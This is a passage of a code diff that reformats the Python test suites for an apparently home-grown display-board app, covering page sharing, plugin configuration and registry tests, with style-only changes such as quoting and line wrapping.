         response = client.delete("/pages/nonexistent-id")
-        
+
         assert response.status_code == 404
-    
+
     def test_preview_page(self, client, mock_page_service):
         """Test POST /pages/{id}/preview."""
         mock_page_service.preview_page.return_value = DisplayResult(
-            display_type="page:single",
-            formatted="Preview Content\nLine 2",
-            raw={"page_id": "test-id"},
-            available=True
+            display_type="page:single", formatted="Preview Content\nLine 2", raw={"page_id": "test-id"}, available=True
         )
-        
+
         response = client.post("/pages/test-id/preview")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["page_id"] == "test-id"
         assert "Preview Content" in data["message"]
 
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_settings_service")
     def test_current_display_template_page(self, mock_settings, client, mock_page_service):
         """Test GET /pages/current-display returns raw template for template pages."""
         mock_svc = Mock()
@@ -1154,7 +1107,7 @@ class TestPagesAPIEndpoints:
         assert data["line_metadata"][0]["alignment"] == "center"
         assert data["line_metadata"][1]["wrap"] is True
 
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_settings_service")
     def test_current_display_single_page(self, mock_settings, client, mock_page_service):
         """Test GET /pages/current-display returns rendered lines for non-template pages."""
         mock_svc = Mock()
@@ -1185,7 +1138,7 @@ class TestPagesAPIEndpoints:
         assert data["template"] == ["72°F Sunny", "Humidity 45%"]
         assert data["line_metadata"] is None
 
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_settings_service")
     def test_current_display_no_active_page(self, mock_settings, client, mock_page_service):
         """Test GET /pages/current-display returns 404 when no active page."""
         mock_svc = Mock()
@@ -1197,8 +1150,8 @@ class TestPagesAPIEndpoints:
 
         assert response.status_code == 404
 
-    @patch('src.api_server.get_carousel_service')
-    @patch('src.api_server.get_settings_service')
+    @patch("src.api_server.get_carousel_service")
+    @patch("src.api_server.get_settings_service")
     def test_current_display_carousel_resolved(self, mock_settings, mock_carousel, client, mock_page_service):
         """Test GET /pages/current-display resolves carousel to underlying page."""
         mock_svc = Mock()
@@ -1231,12 +1184,12 @@ class TestPageShare:
     """Unit tests for src/pages/share.py encode/decode logic."""
 
     def _make_template_page(self, **kwargs):
-        defaults = dict(
-            name="Morning Brief",
-            type="template",
-            device_type="flagship",
-            template=["{{date_time.time}}", "{{weather.temperature}}°", "", "", "", ""],
-            line_metadata=[
+        defaults = {
+            "name": "Morning Brief",
+            "type": "template",
+            "device_type": "flagship",
+            "template": ["{{date_time.time}}", "{{weather.temperature}}°", "", "", "", ""],
+            "line_metadata": [
                 LineMetadata(alignment="center"),
                 LineMetadata(alignment="left"),
                 LineMetadata(),
@@ -1244,20 +1197,22 @@ class TestPageShare:
                 LineMetadata(),
                 LineMetadata(),
             ],
-            duration_seconds=60,
-        )
+            "duration_seconds": 60,
+        }
         defaults.update(kwargs)
         return Page(**defaults)
 
     def test_encode_returns_string(self):
         from src.pages.share import encode_page
+
         page = self._make_template_page()
         s = encode_page(page)
         assert isinstance(s, str)
         assert len(s) > 0
 
     def test_round_trip_template_page(self):
-        from src.pages.share import encode_page, decode_page
+        from src.pages.share import decode_page, encode_page
+
         page = self._make_template_page()
         s = encode_page(page)
         decoded = decode_page(s)
@@ -1269,20 +1224,23 @@ class TestPageShare:
         assert decoded["duration_seconds"] == page.duration_seconds
 
     def test_round_trip_single_page(self):
-        from src.pages.share import encode_page, decode_page
+        from src.pages.share import decode_page, encode_page
+
         page = Page(name="Weather", type="single", device_type="flagship", display_type="weather")
         decoded = decode_page(encode_page(page))
         assert decoded["name"] == "Weather"
         assert decoded["display_type"] == "weather"
 
     def test_round_trip_note_page(self):
-        from src.pages.share import encode_page, decode_page
+        from src.pages.share import decode_page, encode_page
+
         page = Page(name="Note", type="template", device_type="note", template=["a", "b", "c"])
         decoded = decode_page(encode_page(page))
         assert decoded["device_type"] == "note"
 
     def test_excluded_fields_not_in_share_string(self):
-        from src.pages.share import encode_page, decode_page
+        from src.pages.share import decode_page, encode_page
+
         page = self._make_template_page()
         decoded = decode_page(encode_page(page))
         assert "id" not in decoded
@@ -1292,39 +1250,49 @@ class TestPageShare:
 
     def test_decode_malformed_base64_raises(self):
         from src.pages.share import decode_page
+
         with pytest.raises(ValueError, match="Invalid share string"):
             decode_page("not-valid-base64!!!")
 
     def test_decode_valid_base64_bad_json_raises(self):
         import base64
+
         from src.pages.share import decode_page
+
         bad = base64.urlsafe_b64encode(b"not json at all").decode().rstrip("=")
         with pytest.raises(ValueError, match="Invalid share string"):
             decode_page(bad)
 
     def test_decode_missing_version_raises(self):
         import base64
+
         from src.pages.share import decode_page
+
         payload = base64.urlsafe_b64encode(json.dumps({"page": {}}).encode()).decode().rstrip("=")
         with pytest.raises(ValueError, match="Invalid share string"):
             decode_page(payload)
 
     def test_decode_future_version_raises(self):
         import base64
+
         from src.pages.share import decode_page
+
         payload = base64.urlsafe_b64encode(json.dumps({"v": 999, "page": {}}).encode()).decode().rstrip("=")
         with pytest.raises(ValueError, match="requires FiestaBoard"):
             decode_page(payload)
 
     def test_decode_version_zero_raises(self):
         import base64
+
         from src.pages.share import decode_page
+
         payload = base64.urlsafe_b64encode(json.dumps({"v": 0, "page": {}}).encode()).decode().rstrip("=")
         with pytest.raises(ValueError):
             decode_page(payload)
 
     def test_share_string_url_safe(self):
         from src.pages.share import encode_page
+
         page = self._make_template_page()
         s = encode_page(page)
         # Must not contain +, /, or = (URL-unsafe characters)
@@ -1338,13 +1306,15 @@ class TestPageShareAPIEndpoints:
 
     @pytest.fixture
     def client(self):
-        from src.api_server import app
         from fastapi.testclient import TestClient
+
+        from src.api_server import app
+
         return TestClient(app)
 
     @pytest.fixture
     def mock_page_service(self):
-        with patch('src.api_server.get_page_service') as mock:
+        with patch("src.api_server.get_page_service") as mock:
             mock_service = Mock()
             mock.return_value = mock_service
             yield mock_service
@@ -1375,6 +1345,7 @@ class TestPageShareAPIEndpoints:
     def test_get_share_string_content(self, client, mock_page_service):
         """Share string decodes back to the original page's content fields."""
         from src.pages.share import decode_page
+
         mock_page_service.get_page.return_value = self._sample_page()
         response = client.get("/pages/abc-123/share")
         decoded = decode_page(response.json()["share_string"])
@@ -1383,10 +1354,14 @@ class TestPageShareAPIEndpoints:
 
     def test_import_page_success(self, client, mock_page_service):
         from src.pages.share import encode_page
+
         share_string = encode_page(self._sample_page())
         mock_page_service.create_page.return_value = Page(
-            id="new-id", name="Test Page", type="template",
-            device_type="flagship", template=["Hello", "World", "", "", "", ""],
+            id="new-id",
+            name="Test Page",
+            type="template",
+            device_type="flagship",
+            template=["Hello", "World", "", "", "", ""],
         )
         response = client.post("/pages/import", json={"share_string": share_string})
         assert response.status_code == 200
@@ -1398,10 +1373,14 @@ class TestPageShareAPIEndpoints:
     def test_import_page_creates_new_id(self, client, mock_page_service):
         """Import should always create a new page, never reuse the original id."""
         from src.pages.share import encode_page
+
         share_string = encode_page(self._sample_page())
         mock_page_service.create_page.return_value = Page(
-            id="brand-new-id", name="Test Page", type="template",
-            device_type="flagship", template=["Hello", "World", "", "", "", ""],
+            id="brand-new-id",
+            name="Test Page",
+            type="template",
+            device_type="flagship",
+            template=["Hello", "World", "", "", "", ""],
         )
         client.post("/pages/import", json={"share_string": share_string})
         # The PageCreate passed to create_page must not carry the original id
@@ -1414,6 +1393,7 @@ class TestPageShareAPIEndpoints:
 
     def test_import_preview_success(self, client, mock_page_service):
         from src.pages.share import encode_page
+
         share_string = encode_page(self._sample_page())
         response = client.post("/pages/import/preview", json={"share_string": share_string})
         assert response.status_code == 200
@@ -1428,10 +1408,8 @@ class TestPageShareAPIEndpoints:
 
     def test_import_future_version_share_string(self, client, mock_page_service):
         import base64
-        payload = base64.urlsafe_b64encode(
-            json.dumps({"v": 999, "page": {"name": "x"}}).encode()
-        ).decode().rstrip("=")
+
+        payload = base64.urlsafe_b64encode(json.dumps({"v": 999, "page": {"name": "x"}}).encode()).decode().rstrip("=")
         response = client.post("/pages/import", json={"share_string": payload})
         assert response.status_code == 422
         assert "FiestaBoard" in response.json()["detail"]
-

--- a/tests/test_plugin_base_refresh.py
+++ b/tests/test_plugin_base_refresh.py
@@ -2,14 +2,12 @@
 
 from datetime import datetime, timedelta
 
-
 from src.plugins.base import (
     DEFAULT_REFRESH_SECONDS,
     MIN_REFRESH_SECONDS,
     PluginBase,
     PluginResult,
 )
-
 
 MANIFEST_WITH_REFRESH = {
     "id": "test_plugin",
@@ -53,9 +51,7 @@ MANIFEST_WITHOUT_REFRESH = {
     "version": "1.0.0",
     "settings_schema": {
         "type": "object",
-        "properties": {
-            "enabled": {"type": "boolean", "default": False}
-        },
+        "properties": {"enabled": {"type": "boolean", "default": False}},
     },
 }
 
@@ -145,9 +141,7 @@ class TestRefreshSecondsProperty:
             "version": "1.0.0",
             "settings_schema": {
                 "type": "object",
-                "properties": {
-                    "refresh_seconds": {"type": "integer", "minimum": 10}
-                },
+                "properties": {"refresh_seconds": {"type": "integer", "minimum": 10}},
             },
         }
         plugin = ConcretePlugin(manifest)
@@ -357,9 +351,7 @@ class TestValidateRefreshSeconds:
             "version": "1.0.0",
             "settings_schema": {
                 "type": "object",
-                "properties": {
-                    "refresh_seconds": {"type": "integer"}
-                },
+                "properties": {"refresh_seconds": {"type": "integer"}},
             },
         }
         plugin = ConcretePlugin(manifest)
@@ -397,9 +389,7 @@ class TestMinRefreshSecondsProperty:
             "version": "1.0.0",
             "settings_schema": {
                 "type": "object",
-                "properties": {
-                    "refresh_seconds": {"type": "integer", "minimum": 60}
-                },
+                "properties": {"refresh_seconds": {"type": "integer", "minimum": 60}},
             },
         }
         plugin = ConcretePlugin(manifest)
@@ -412,9 +402,7 @@ class TestMinRefreshSecondsProperty:
             "version": "1.0.0",
             "settings_schema": {
                 "type": "object",
-                "properties": {
-                    "refresh_seconds": {"type": "integer"}
-                },
+                "properties": {"refresh_seconds": {"type": "integer"}},
             },
         }
         plugin = ConcretePlugin(manifest)
@@ -432,9 +420,7 @@ class TestMinRefreshSecondsProperty:
             "min_refresh_seconds": 120,
             "settings_schema": {
                 "type": "object",
-                "properties": {
-                    "refresh_seconds": {"type": "integer", "minimum": 60}
-                },
+                "properties": {"refresh_seconds": {"type": "integer", "minimum": 60}},
             },
         }
         plugin = ConcretePlugin(manifest)

--- a/tests/test_plugin_config_interpolation.py
+++ b/tests/test_plugin_config_interpolation.py
@@ -6,14 +6,12 @@ are correctly resolved to their dynamic values at runtime.
 
 import re
 
-
 from src.plugins.base import PluginBase, PluginResult
 from src.plugins.config_interpolation import (
     get_builtin_variables,
     interpolate_config,
     interpolate_string,
 )
-
 
 # ── Test fixtures ──────────────────────────────────────────────
 
@@ -234,13 +232,7 @@ class TestInterpolateConfig:
         ]
 
     def test_deeply_nested(self):
-        config = {
-            "level1": {
-                "level2": {
-                    "level3": "value-{{key}}"
-                }
-            }
-        }
+        config = {"level1": {"level2": {"level3": "value-{{key}}"}}}
         variables = {"key": "resolved"}
         result = interpolate_config(config, variables)
         assert result["level1"]["level2"]["level3"] == "value-resolved"
@@ -360,24 +352,20 @@ class TestPluginBaseResolveConfigVariables:
     def test_returns_copy_not_original(self):
         plugin = InterpolatingPlugin()
         plugin._config = {"url": "https://api.example.com/{{date}}"}
-        resolved = plugin.resolve_config_variables()
+        plugin.resolve_config_variables()
         # Original should not be mutated
         assert "{{date}}" in plugin._config["url"]
 
     def test_with_extra_context(self):
         plugin = InterpolatingPlugin()
         plugin._config = {"url": "https://api.example.com/{{custom_var}}"}
-        resolved = plugin.resolve_config_variables(
-            extra_variables={"custom_var": "hello"}
-        )
+        resolved = plugin.resolve_config_variables(extra_variables={"custom_var": "hello"})
         assert resolved["url"] == "https://api.example.com/hello"
 
     def test_extra_context_overrides_builtin(self):
         plugin = InterpolatingPlugin()
         plugin._config = {"url": "https://api.example.com/{{date}}"}
-        resolved = plugin.resolve_config_variables(
-            extra_variables={"date": "custom-date"}
-        )
+        resolved = plugin.resolve_config_variables(extra_variables={"date": "custom-date"})
         assert resolved["url"] == "https://api.example.com/custom-date"
 
     def test_empty_config(self):
@@ -469,31 +457,21 @@ class TestCrossPluginVariables:
 
     def test_reference_other_plugin_variable(self):
         plugin = InterpolatingPlugin()
-        plugin._config = {
-            "url": "https://api.example.com/{{weather.location}}"
-        }
-        resolved = plugin.resolve_config_variables(
-            extra_variables={"weather.location": "san-francisco"}
-        )
+        plugin._config = {"url": "https://api.example.com/{{weather.location}}"}
+        resolved = plugin.resolve_config_variables(extra_variables={"weather.location": "san-francisco"})
         assert resolved["url"] == "https://api.example.com/san-francisco"
 
     def test_mixed_builtin_and_cross_plugin(self):
         plugin = InterpolatingPlugin()
-        plugin._config = {
-            "url": "https://api.example.com/{{date}}/{{weather.location}}"
-        }
-        resolved = plugin.resolve_config_variables(
-            extra_variables={"weather.location": "sf"}
-        )
+        plugin._config = {"url": "https://api.example.com/{{date}}/{{weather.location}}"}
+        resolved = plugin.resolve_config_variables(extra_variables={"weather.location": "sf"})
         # date should be resolved from builtin, location from extra
         assert "sf" in resolved["url"]
         assert re.search(r"\d{4}-\d{2}-\d{2}", resolved["url"])
 
     def test_unknown_cross_plugin_variable_preserved(self):
         plugin = InterpolatingPlugin()
-        plugin._config = {
-            "url": "https://api.example.com/{{nonexistent.var}}"
-        }
+        plugin._config = {"url": "https://api.example.com/{{nonexistent.var}}"}
         resolved = plugin.resolve_config_variables()
         assert resolved["url"] == "https://api.example.com/{{nonexistent.var}}"
 

--- a/tests/test_plugin_instances.py
+++ b/tests/test_plugin_instances.py
@@ -12,10 +12,9 @@ import pytest
 from src.plugins.base import PluginBase, PluginResult
 from src.plugins.manifest import PluginManifest
 from src.plugins.registry import (
-    PluginRegistry,
     _INSTANCE_LABEL_RE,
+    PluginRegistry,
 )
-
 
 # ── fixtures ────────────────────────────────────────────────────────────────
 
@@ -489,9 +488,7 @@ class TestRestoreInstances:
         mock_config_manager.set_plugin_config.assert_called_with(
             "test_plugin:fijiaustralia", {"enabled": True, "setting": "v"}
         )
-        mock_config_manager.delete_plugin_config.assert_called_with(
-            "test_plugin:FijiAustralia"
-        )
+        mock_config_manager.delete_plugin_config.assert_called_with("test_plugin:FijiAustralia")
 
     def test_restore_lowercase_key_does_not_trigger_migration(self, registry_with_plugin, mock_loader):
         """Already-lowercase keys should not re-save or delete config."""
@@ -546,13 +543,18 @@ class TestPluginInstanceEndpoints:
     @pytest.fixture
     def client(self):
         from fastapi.testclient import TestClient
+
         from src.api_server import app
+
         return TestClient(app)
 
     @pytest.fixture
     def mock_registry(self):
         registry = Mock()
-        registry.parse_instance_key.side_effect = lambda k: (k.split(":", 1)[0], k.split(":", 1)[1] if ":" in k else None)
+        registry.parse_instance_key.side_effect = lambda k: (
+            k.split(":", 1)[0],
+            k.split(":", 1)[1] if ":" in k else None,
+        )
         registry.make_instance_key.side_effect = lambda base, label: f"{base}:{label}"
         registry.is_instance_key.side_effect = lambda k: ":" in k
         return registry
@@ -564,8 +566,10 @@ class TestPluginInstanceEndpoints:
         mock_registry.list_instances.return_value = [
             {"id": "weather:sf", "instance_label": "sf", "enabled": False},
         ]
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.get("/plugins/weather/instances")
         assert resp.status_code == 200
         data = resp.json()
@@ -575,8 +579,10 @@ class TestPluginInstanceEndpoints:
 
     def test_list_instances_plugin_not_found(self, client, mock_registry):
         mock_registry.get_plugin.return_value = None
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.get("/plugins/nonexistent/instances")
         assert resp.status_code == 404
 
@@ -591,11 +597,13 @@ class TestPluginInstanceEndpoints:
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.create_instance.return_value = []  # no errors
         mock_cm = Mock()
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server.reset_display_service"),
+            patch("src.api_server.reset_template_engine"),
+        ):
             resp = client.post("/plugins/weather/instances", json={"label": "sf"})
         assert resp.status_code == 200
         data = resp.json()
@@ -609,11 +617,13 @@ class TestPluginInstanceEndpoints:
         """Creating an instance should reset display and template services."""
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.create_instance.return_value = []
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("src.api_server.get_config_manager", return_value=Mock()), \
-             patch("src.api_server.reset_display_service") as mock_rds, \
-             patch("src.api_server.reset_template_engine") as mock_rte:
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("src.api_server.get_config_manager", return_value=Mock()),
+            patch("src.api_server.reset_display_service") as mock_rds,
+            patch("src.api_server.reset_template_engine") as mock_rte,
+        ):
             client.post("/plugins/weather/instances", json={"label": "nyc"})
         mock_rds.assert_called_once()
         mock_rte.assert_called_once()
@@ -621,16 +631,20 @@ class TestPluginInstanceEndpoints:
     def test_create_instance_validation_error(self, client, mock_registry):
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.create_instance.return_value = ["Label already exists"]
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/weather/instances", json={"label": "sf"})
         assert resp.status_code == 400
         assert "Label already exists" in resp.json()["detail"]
 
     def test_create_instance_plugin_not_found(self, client, mock_registry):
         mock_registry.get_plugin.return_value = None
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/nonexistent/instances", json={"label": "sf"})
         assert resp.status_code == 404
 
@@ -644,11 +658,13 @@ class TestPluginInstanceEndpoints:
     def test_delete_instance_success(self, client, mock_registry):
         mock_registry.delete_instance.return_value = []  # no errors
         mock_cm = Mock()
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server.reset_display_service"),
+            patch("src.api_server.reset_template_engine"),
+        ):
             resp = client.delete("/plugins/weather/instances/sf")
         assert resp.status_code == 200
         data = resp.json()
@@ -660,19 +676,23 @@ class TestPluginInstanceEndpoints:
     def test_delete_instance_resets_services(self, client, mock_registry):
         """Deleting an instance should reset display and template services."""
         mock_registry.delete_instance.return_value = []
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("src.api_server.get_config_manager", return_value=Mock()), \
-             patch("src.api_server.reset_display_service") as mock_rds, \
-             patch("src.api_server.reset_template_engine") as mock_rte:
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("src.api_server.get_config_manager", return_value=Mock()),
+            patch("src.api_server.reset_display_service") as mock_rds,
+            patch("src.api_server.reset_template_engine") as mock_rte,
+        ):
             client.delete("/plugins/weather/instances/sf")
         mock_rds.assert_called_once()
         mock_rte.assert_called_once()
 
     def test_delete_instance_not_found(self, client, mock_registry):
         mock_registry.delete_instance.return_value = ["Instance not found"]
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.delete("/plugins/weather/instances/nonexistent")
         assert resp.status_code == 400
 

--- a/tests/test_plugin_loader.py
+++ b/tests/test_plugin_loader.py
@@ -4,7 +4,6 @@ import sys
 from pathlib import Path
 from unittest.mock import MagicMock, patch
 
-
 from src.plugins.loader import PluginLoader
 
 
@@ -31,9 +30,10 @@ def create_valid_plugin_dir(tmp_path: Path, plugin_id: str = "test_plugin") -> P
     plugin_dir = tmp_path / plugin_id
     plugin_dir.mkdir()
 
-    manifest = {**VALID_MANIFEST, "id": plugin_id}
     (plugin_dir / "manifest.json").write_text(
-        '{"id":"' + plugin_id + '","name":"Test","version":"1.0.0","description":"","author":"","variables":{"simple":["var1"]},"max_lengths":{}}'
+        '{"id":"'
+        + plugin_id
+        + '","name":"Test","version":"1.0.0","description":"","author":"","variables":{"simple":["var1"]},"max_lengths":{}}'
     )
 
     plugin_code = f'''
@@ -424,7 +424,6 @@ def test_reload_plugin_unloads_and_loads_again(tmp_path):
     loader = _loader_for_tests(tmp_path)
     loader.load_plugin("test_plugin")
 
-    module_name = "plugins.test_plugin"
     # Plugin was loaded so it may be in sys.modules
     reloaded = loader.reload_plugin("test_plugin")
     assert reloaded is not None

--- a/tests/test_plugin_registry.py
+++ b/tests/test_plugin_registry.py
@@ -104,7 +104,22 @@ def test_enabled_plugins_returns_only_enabled(registry, mock_loader, mock_plugin
     plugin2 = MagicMock(spec=PluginBase)
     plugin2.plugin_id = "plugin2"
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin, "plugin2": plugin2}
-    mock_loader.get_manifest.side_effect = lambda pid: mock_manifest if pid == "test_plugin" else MagicMock(id=pid, name=pid, version="1.0.0", description="", author="", icon="puzzle", category="utility", variables=MagicMock(get_all_variable_names=lambda _: []), max_lengths={}, raw={})
+    mock_loader.get_manifest.side_effect = (
+        lambda pid: mock_manifest
+        if pid == "test_plugin"
+        else MagicMock(
+            id=pid,
+            name=pid,
+            version="1.0.0",
+            description="",
+            author="",
+            icon="puzzle",
+            category="utility",
+            variables=MagicMock(get_all_variable_names=lambda _: []),
+            max_lengths={},
+            raw={},
+        )
+    )
 
     # Patch config manager so the migration doesn't pull in configs from the
     # developer's real data/config.json and auto-install external plugins.
@@ -533,9 +548,7 @@ def test_reload_plugin_preserves_config_when_new_version_fails_validation(
     mock_loader.get_manifest.side_effect = lambda pid: mock_manifest if pid == "test_plugin" else None
     with patch("src.config_manager.get_config_manager") as mock_cm:
         # Plugin is DISABLED but has stored config — the path where the bug bites.
-        mock_cm.return_value.get_all_plugin_configs.return_value = {
-            "test_plugin": {"enabled": False, **stored_config}
-        }
+        mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": False, **stored_config}}
         registry.initialize()
 
     # Verify the stored config was applied during initialization.
@@ -674,9 +687,7 @@ def test_auto_discover_introspects_data_keys(registry, mock_loader, mock_plugin)
     manifest = _make_autodiscover_manifest(auto_discover=True, simple=[])
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin}
     mock_loader.get_manifest.side_effect = lambda pid: manifest if pid == "test_plugin" else None
-    mock_plugin.get_data.return_value = PluginResult(
-        available=True, data={"discovered_a": "hello", "discovered_b": 42}
-    )
+    mock_plugin.get_data.return_value = PluginResult(available=True, data={"discovered_a": "hello", "discovered_b": 42})
     with patch("src.config_manager.get_config_manager") as mock_cm:
         mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": True}}
         registry.initialize()
@@ -692,9 +703,7 @@ def test_auto_discover_merges_with_manifest(registry, mock_loader, mock_plugin):
     manifest = _make_autodiscover_manifest(auto_discover=True, simple=["declared"])
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin}
     mock_loader.get_manifest.side_effect = lambda pid: manifest if pid == "test_plugin" else None
-    mock_plugin.get_data.return_value = PluginResult(
-        available=True, data={"declared": "val", "extra": "bonus"}
-    )
+    mock_plugin.get_data.return_value = PluginResult(available=True, data={"declared": "val", "extra": "bonus"})
     with patch("src.config_manager.get_config_manager") as mock_cm:
         mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": True}}
         registry.initialize()
@@ -709,9 +718,7 @@ def test_auto_discover_off_hides_undeclared_keys(registry, mock_loader, mock_plu
     manifest = _make_autodiscover_manifest(auto_discover=False, simple=["declared"])
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin}
     mock_loader.get_manifest.side_effect = lambda pid: manifest if pid == "test_plugin" else None
-    mock_plugin.get_data.return_value = PluginResult(
-        available=True, data={"declared": "val", "hidden": "secret"}
-    )
+    mock_plugin.get_data.return_value = PluginResult(available=True, data={"declared": "val", "hidden": "secret"})
     with patch("src.config_manager.get_config_manager") as mock_cm:
         mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": True}}
         registry.initialize()
@@ -726,9 +733,7 @@ def test_auto_discover_on_when_no_variables_section(registry, mock_loader, mock_
     manifest = _make_autodiscover_manifest(auto_discover=True, simple=[])
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin}
     mock_loader.get_manifest.side_effect = lambda pid: manifest if pid == "test_plugin" else None
-    mock_plugin.get_data.return_value = PluginResult(
-        available=True, data={"auto_field": "value"}
-    )
+    mock_plugin.get_data.return_value = PluginResult(available=True, data={"auto_field": "value"})
     with patch("src.config_manager.get_config_manager") as mock_cm:
         mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": True}}
         registry.initialize()
@@ -739,7 +744,7 @@ def test_auto_discover_on_when_no_variables_section(registry, mock_loader, mock_
 
 def test_get_all_variables_with_metadata(registry, mock_loader, mock_plugin):
     """get_all_variables_with_metadata returns metadata and preview values."""
-    from src.plugins.manifest import VariablesSchema, VariableMetadata
+    from src.plugins.manifest import VariableMetadata, VariablesSchema
 
     manifest = MagicMock(spec=PluginManifest)
     manifest.id = "test_plugin"
@@ -762,9 +767,7 @@ def test_get_all_variables_with_metadata(registry, mock_loader, mock_plugin):
 
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin}
     mock_loader.get_manifest.side_effect = lambda pid: manifest if pid == "test_plugin" else None
-    mock_plugin.get_data.return_value = PluginResult(
-        available=True, data={"temp": "72"}
-    )
+    mock_plugin.get_data.return_value = PluginResult(available=True, data={"temp": "72"})
     with patch("src.config_manager.get_config_manager") as mock_cm:
         mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": True}}
         registry.initialize()
@@ -782,9 +785,7 @@ def test_clear_discovered_cache(registry, mock_loader, mock_plugin):
     manifest = _make_autodiscover_manifest(auto_discover=True, simple=[])
     mock_loader.load_all_plugins.return_value = {"test_plugin": mock_plugin}
     mock_loader.get_manifest.side_effect = lambda pid: manifest if pid == "test_plugin" else None
-    mock_plugin.get_data.return_value = PluginResult(
-        available=True, data={"field": "val"}
-    )
+    mock_plugin.get_data.return_value = PluginResult(available=True, data={"field": "val"})
     with patch("src.config_manager.get_config_manager") as mock_cm:
         mock_cm.return_value.get_all_plugin_configs.return_value = {"test_plugin": {"enabled": True}}
         registry.initialize()
@@ -904,10 +905,14 @@ def test_get_registry_entries_marks_installed(mock_load, registry, mock_loader, 
 @patch("src.plugins.registry.get_external_plugins_dir")
 @patch("src.plugins.registry.install_registry_plugin", return_value=(True, ""))
 @patch("src.plugins.registry.load_registry")
-def test_install_from_registry_success(mock_load, mock_install, mock_dir, registry, mock_loader, mock_plugin, mock_manifest):
+def test_install_from_registry_success(
+    mock_load, mock_install, mock_dir, registry, mock_loader, mock_plugin, mock_manifest
+):
     """install_from_registry installs and loads the plugin."""
     mock_load.return_value = [
-        RegistryEntry(plugin_id="weather", name="Weather", repository="https://github.com/Org/fiestaboard-plugin--weather"),
+        RegistryEntry(
+            plugin_id="weather", name="Weather", repository="https://github.com/Org/fiestaboard-plugin--weather"
+        ),
     ]
     mock_loader.load_plugin.return_value = mock_plugin
     mock_loader.get_manifest.return_value = mock_manifest
@@ -931,7 +936,9 @@ def test_install_from_registry_not_found(mock_load, registry):
 def test_install_from_registry_clone_failure(mock_load, mock_install, registry):
     """install_from_registry returns error when clone fails."""
     mock_load.return_value = [
-        RegistryEntry(plugin_id="weather", name="Weather", repository="https://github.com/Org/fiestaboard-plugin--weather"),
+        RegistryEntry(
+            plugin_id="weather", name="Weather", repository="https://github.com/Org/fiestaboard-plugin--weather"
+        ),
     ]
     errors = registry.install_from_registry("weather")
     assert errors == ["clone failed"]
@@ -980,11 +987,11 @@ def test_auto_migrate_noop_when_all_configs_are_loaded(registry, mock_loader, mo
     mock_loader.get_manifest.side_effect = lambda pid: mock_manifest if pid == "weather" else None
     mock_manifest.id = "weather"
 
-    with patch("src.plugins.registry.load_registry") as mock_load_reg, \
